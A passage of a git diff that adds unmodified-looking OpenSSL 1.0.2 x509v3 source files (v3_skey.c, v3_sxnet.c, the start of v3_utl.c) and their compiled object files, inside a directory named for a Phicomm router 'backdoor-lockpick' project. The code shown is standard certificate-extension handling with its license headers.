@@ -0,0 +1,150 @@
+/* v3_skey.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509v3.h>
+
+static ASN1_OCTET_STRING *s2i_skey_id(X509V3_EXT_METHOD *method,
+                                      X509V3_CTX *ctx, char *str);
+const X509V3_EXT_METHOD v3_skey_id = {
+    NID_subject_key_identifier, 0, ASN1_ITEM_ref(ASN1_OCTET_STRING),
+    0, 0, 0, 0,
+    (X509V3_EXT_I2S)i2s_ASN1_OCTET_STRING,
+    (X509V3_EXT_S2I)s2i_skey_id,
+    0, 0, 0, 0,
+    NULL
+};
+
+char *i2s_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method, ASN1_OCTET_STRING *oct)
+{
+    return hex_to_string(oct->data, oct->length);
+}
+
+ASN1_OCTET_STRING *s2i_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method,
+                                         X509V3_CTX *ctx, char *str)
+{
+    ASN1_OCTET_STRING *oct;
+    long length;
+
+    if (!(oct = M_ASN1_OCTET_STRING_new())) {
+        X509V3err(X509V3_F_S2I_ASN1_OCTET_STRING, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (!(oct->data = string_to_hex(str, &length))) {
+        M_ASN1_OCTET_STRING_free(oct);
+        return NULL;
+    }
+
+    oct->length = length;
+
+    return oct;
+
+}
+
+static ASN1_OCTET_STRING *s2i_skey_id(X509V3_EXT_METHOD *method,
+                                      X509V3_CTX *ctx, char *str)
+{
+    ASN1_OCTET_STRING *oct;
+    ASN1_BIT_STRING *pk;
+    unsigned char pkey_dig[EVP_MAX_MD_SIZE];
+    unsigned int diglen;
+
+    if (strcmp(str, "hash"))
+        return s2i_ASN1_OCTET_STRING(method, ctx, str);
+
+    if (!(oct = M_ASN1_OCTET_STRING_new())) {
+        X509V3err(X509V3_F_S2I_SKEY_ID, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (ctx && (ctx->flags == CTX_TEST))
+        return oct;
+
+    if (!ctx || (!ctx->subject_req && !ctx->subject_cert)) {
+        X509V3err(X509V3_F_S2I_SKEY_ID, X509V3_R_NO_PUBLIC_KEY);
+        goto err;
+    }
+
+    if (ctx->subject_req)
+        pk = ctx->subject_req->req_info->pubkey->public_key;
+    else
+        pk = ctx->subject_cert->cert_info->key->public_key;
+
+    if (!pk) {
+        X509V3err(X509V3_F_S2I_SKEY_ID, X509V3_R_NO_PUBLIC_KEY);
+        goto err;
+    }
+
+    if (!EVP_Digest
+        (pk->data, pk->length, pkey_dig, &diglen, EVP_sha1(), NULL))
+        goto err;
+
+    if (!M_ASN1_OCTET_STRING_set(oct, pkey_dig, diglen)) {
+        X509V3err(X509V3_F_S2I_SKEY_ID, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    return oct;
+
+ err:
+    M_ASN1_OCTET_STRING_free(oct);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_skey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_skey.o
new file mode 100644
index 0000000000000000000000000000000000000000..5ca12b98540b7d4153f4bfd55da713d3c76e2a83
GIT binary patch
literal 3560
zcmcJR|7#pY6u{?h)8?#pbN!|#Ddi|viP|o=Nu}x!a+l<i4K9gXE+t^g_Hx<ejwE--
z?w%%<#!5_axdufL^#{RUl>Fo$AZQL-iv2<SLHvUKMMP}VSc{Z`h*IC1ok`|4w;%-{
z?9H3cy!YnKo1NKvHKPxNLm|Q?M4lsCJx&R^@xYdzqH2mnNe8*pap*6-uv4oqMs)Ye
zI*uSp=hoUl9n;)zwWZ%;lUlv)NEZOj?N3D1#tpO^axZJkjap|$ZKzj2O#}J73O{Ry
z;fES*JfXS2YVK`j4W4MfTX(N#)L%S{2n0@~-L`~Qhv7-B$D794L5H=a%Q4;k>2&(k
zC7RUOko%A3exJ@kUU#*Xr(hxi>78jxZ(MC?ZY~k=BGf@!ZaDii_ji3WlgsPhVWPM~
zmK$BkAz>vp8f>m){bQVI`Id8V=^P1ly#6kB>zNp?=Kv^Cs(9`ejBOZN9Sl-k8||Kw
z)apf8{VnI3msX($!{;Iy^{T!yn}`j$4Q)kF?AP6!bR0513YkM6vcAqxEfJWXP*N=9
zc#A@w@d}wfeW{qYi;$xyS+4xw?O<Quv+=I6iCWpI#h+1nl;kn>M2&XU#qOk%JpQ<c
zy+m+tqVVj1XK;9ogb8UNli)$w?=>WJHcLYD(NO0@?UA?O#YdlmY-}HE6VN7^{tmVS
za`a+&K#pCI2IXY<6*<-~M|<T6+Ke;1=kXAM-AY)KV;7~g9KX;uET0caM?!MEUyk)s
z4`$q=LH9QD$GsLqum&96F4E@en#UxF)Jh~;o#v4Tp&N$ys|?e1FkK=$n~gWQa5)GT
z64@p6wp5AWEY0!=?c#227l}l+LENLgLLK;Cbpyve^os_d6+a0a<8Xhvzrbb#>|YDu
zZwBxW0{ABZd@X=q3E*D`@E-&CP2hWkedH(kZh$>`smHKq%mt-D?Cug(jnX7h^u8o1
zb=yXIbXYY;`f{0^F`CN`4G$7yP#@_{>&D2yz$nmMx>wH_q-f3?PQ|btt5lw*p|*Qc
z;zco>g{o<k&6i0gn>DI6$1p9cViC_DBSAnSI!sxnNeq}EUzjlp#TjENUz$bx!d#VP
zPQGB+#k@+D{?fE*J5A2E>F|Z(>b9k3lpLrJ$_cNbCu$Gqf8X<jpL;xMdj)O^_V|u*
z`?CVayNL7m1%5!_pD_;i7(G4Q{+eL_uwZ{%;P~Eid;Y1%JjMJEvn$1)za?-yqdd;r
z0*?v&BY{6E@Gk@|*5@mMi*@)};9?y*ASMdti8{}R-w^252@e;%lTncGrkeNjG}Dn|
zO;=ez&RS&na5>Ht&iQ?D%Ex&eqSy;_PJRMf$MV`D*DP~3uQ=wsLzKz9lPAiAZ4<?+
zU<b`rMTIUJQ34ta5~Wa?n={McRIWIt0w1+w^krxL>2gh}T9vA4ISb6&EE-c*evZF_
zd@1+U#=#3~<^KYtfT7&MK|y?7x+l12DZvKSWV;96V-C1SsPg^9cMIh)c#!k&H!_qS
zag#hmfBo|x1&T56*Ixx+jEUbDQTY7+FBhMmw;6Ck-9LYd<zEzof*$wvQ_yc!zb{##
zG-i+W!#!e{@cLze;r#qOfJ$YR&Hp3^tmS$0_C?@a7frwUkM*AcC){ek`40@l#h{?`
z{5f6%1?Tts|H;4`+>o_?|3%=f>KA2yT{Py0^}~NB+@II4)!gWEo^9xdEDsqN#_;>&
fH2%E@MB?l~?eZ1Z*QIxLEB|qp{|W{Z#P9zv7UKIg

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_sxnet.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_sxnet.c
new file mode 100644
index 0000000..a4e6a93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_sxnet.c
@@ -0,0 +1,273 @@
+/* v3_sxnet.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+/* Support for Thawte strong extranet extension */
+
+#define SXNET_TEST
+
+static int sxnet_i2r(X509V3_EXT_METHOD *method, SXNET *sx, BIO *out,
+                     int indent);
+#ifdef SXNET_TEST
+static SXNET *sxnet_v2i(X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
+                        STACK_OF(CONF_VALUE) *nval);
+#endif
+const X509V3_EXT_METHOD v3_sxnet = {
+    NID_sxnet, X509V3_EXT_MULTILINE, ASN1_ITEM_ref(SXNET),
+    0, 0, 0, 0,
+    0, 0,
+    0,
+#ifdef SXNET_TEST
+    (X509V3_EXT_V2I)sxnet_v2i,
+#else
+    0,
+#endif
+    (X509V3_EXT_I2R)sxnet_i2r,
+    0,
+    NULL
+};
+
+ASN1_SEQUENCE(SXNETID) = {
+        ASN1_SIMPLE(SXNETID, zone, ASN1_INTEGER),
+        ASN1_SIMPLE(SXNETID, user, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(SXNETID)
+
+IMPLEMENT_ASN1_FUNCTIONS(SXNETID)
+
+ASN1_SEQUENCE(SXNET) = {
+        ASN1_SIMPLE(SXNET, version, ASN1_INTEGER),
+        ASN1_SEQUENCE_OF(SXNET, ids, SXNETID)
+} ASN1_SEQUENCE_END(SXNET)
+
+IMPLEMENT_ASN1_FUNCTIONS(SXNET)
+
+static int sxnet_i2r(X509V3_EXT_METHOD *method, SXNET *sx, BIO *out,
+                     int indent)
+{
+    long v;
+    char *tmp;
+    SXNETID *id;
+    int i;
+    v = ASN1_INTEGER_get(sx->version);
+    BIO_printf(out, "%*sVersion: %ld (0x%lX)", indent, "", v + 1, v);
+    for (i = 0; i < sk_SXNETID_num(sx->ids); i++) {
+        id = sk_SXNETID_value(sx->ids, i);
+        tmp = i2s_ASN1_INTEGER(NULL, id->zone);
+        BIO_printf(out, "\n%*sZone: %s, User: ", indent, "", tmp);
+        OPENSSL_free(tmp);
+        M_ASN1_OCTET_STRING_print(out, id->user);
+    }
+    return 1;
+}
+
+#ifdef SXNET_TEST
+
+/*
+ * NBB: this is used for testing only. It should *not* be used for anything
+ * else because it will just take static IDs from the configuration file and
+ * they should really be separate values for each user.
+ */
+
+static SXNET *sxnet_v2i(X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
+                        STACK_OF(CONF_VALUE) *nval)
+{
+    CONF_VALUE *cnf;
+    SXNET *sx = NULL;
+    int i;
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        cnf = sk_CONF_VALUE_value(nval, i);
+        if (!SXNET_add_id_asc(&sx, cnf->name, cnf->value, -1))
+            return NULL;
+    }
+    return sx;
+}
+
+#endif
+
+/* Strong Extranet utility functions */
+
+/* Add an id given the zone as an ASCII number */
+
+int SXNET_add_id_asc(SXNET **psx, char *zone, char *user, int userlen)
+{
+    ASN1_INTEGER *izone = NULL;
+    if (!(izone = s2i_ASN1_INTEGER(NULL, zone))) {
+        X509V3err(X509V3_F_SXNET_ADD_ID_ASC, X509V3_R_ERROR_CONVERTING_ZONE);
+        return 0;
+    }
+    return SXNET_add_id_INTEGER(psx, izone, user, userlen);
+}
+
+/* Add an id given the zone as an unsigned long */
+
+int SXNET_add_id_ulong(SXNET **psx, unsigned long lzone, char *user,
+                       int userlen)
+{
+    ASN1_INTEGER *izone = NULL;
+    if (!(izone = M_ASN1_INTEGER_new()) || !ASN1_INTEGER_set(izone, lzone)) {
+        X509V3err(X509V3_F_SXNET_ADD_ID_ULONG, ERR_R_MALLOC_FAILURE);
+        M_ASN1_INTEGER_free(izone);
+        return 0;
+    }
+    return SXNET_add_id_INTEGER(psx, izone, user, userlen);
+
+}
+
+/*
+ * Add an id given the zone as an ASN1_INTEGER. Note this version uses the
+ * passed integer and doesn't make a copy so don't free it up afterwards.
+ */
+
+int SXNET_add_id_INTEGER(SXNET **psx, ASN1_INTEGER *zone, char *user,
+                         int userlen)
+{
+    SXNET *sx = NULL;
+    SXNETID *id = NULL;
+    if (!psx || !zone || !user) {
+        X509V3err(X509V3_F_SXNET_ADD_ID_INTEGER,
+                  X509V3_R_INVALID_NULL_ARGUMENT);
+        return 0;
+    }
+    if (userlen == -1)
+        userlen = strlen(user);
+    if (userlen > 64) {
+        X509V3err(X509V3_F_SXNET_ADD_ID_INTEGER, X509V3_R_USER_TOO_LONG);
+        return 0;
+    }
+    if (!*psx) {
+        if (!(sx = SXNET_new()))
+            goto err;
+        if (!ASN1_INTEGER_set(sx->version, 0))
+            goto err;
+        *psx = sx;
+    } else
+        sx = *psx;
+    if (SXNET_get_id_INTEGER(sx, zone)) {
+        X509V3err(X509V3_F_SXNET_ADD_ID_INTEGER, X509V3_R_DUPLICATE_ZONE_ID);
+        return 0;
+    }
+
+    if (!(id = SXNETID_new()))
+        goto err;
+    if (userlen == -1)
+        userlen = strlen(user);
+
+    if (!M_ASN1_OCTET_STRING_set(id->user, user, userlen))
+        goto err;
+    if (!sk_SXNETID_push(sx->ids, id))
+        goto err;
+    id->zone = zone;
+    return 1;
+
+ err:
+    X509V3err(X509V3_F_SXNET_ADD_ID_INTEGER, ERR_R_MALLOC_FAILURE);
+    SXNETID_free(id);
+    SXNET_free(sx);
+    *psx = NULL;
+    return 0;
+}
+
+ASN1_OCTET_STRING *SXNET_get_id_asc(SXNET *sx, char *zone)
+{
+    ASN1_INTEGER *izone = NULL;
+    ASN1_OCTET_STRING *oct;
+    if (!(izone = s2i_ASN1_INTEGER(NULL, zone))) {
+        X509V3err(X509V3_F_SXNET_GET_ID_ASC, X509V3_R_ERROR_CONVERTING_ZONE);
+        return NULL;
+    }
+    oct = SXNET_get_id_INTEGER(sx, izone);
+    M_ASN1_INTEGER_free(izone);
+    return oct;
+}
+
+ASN1_OCTET_STRING *SXNET_get_id_ulong(SXNET *sx, unsigned long lzone)
+{
+    ASN1_INTEGER *izone = NULL;
+    ASN1_OCTET_STRING *oct;
+    if (!(izone = M_ASN1_INTEGER_new()) || !ASN1_INTEGER_set(izone, lzone)) {
+        X509V3err(X509V3_F_SXNET_GET_ID_ULONG, ERR_R_MALLOC_FAILURE);
+        M_ASN1_INTEGER_free(izone);
+        return NULL;
+    }
+    oct = SXNET_get_id_INTEGER(sx, izone);
+    M_ASN1_INTEGER_free(izone);
+    return oct;
+}
+
+ASN1_OCTET_STRING *SXNET_get_id_INTEGER(SXNET *sx, ASN1_INTEGER *zone)
+{
+    SXNETID *id;
+    int i;
+    for (i = 0; i < sk_SXNETID_num(sx->ids); i++) {
+        id = sk_SXNETID_value(sx->ids, i);
+        if (!M_ASN1_INTEGER_cmp(id->zone, zone))
+            return id->user;
+    }
+    return NULL;
+}
+
+IMPLEMENT_STACK_OF(SXNETID)
+
+IMPLEMENT_ASN1_SET_OF(SXNETID)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_sxnet.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_sxnet.o
new file mode 100644
index 0000000000000000000000000000000000000000..8185f8f11f557379a150ac3eaa017fc72498c14c
GIT binary patch
literal 8264
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
PxUnJqTxF%VxBtHY!T-Rx

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_utl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_utl.c
new file mode 100644
index 0000000..f65323b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_utl.c
@@ -0,0 +1,1337 @@
+/* v3_utl.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
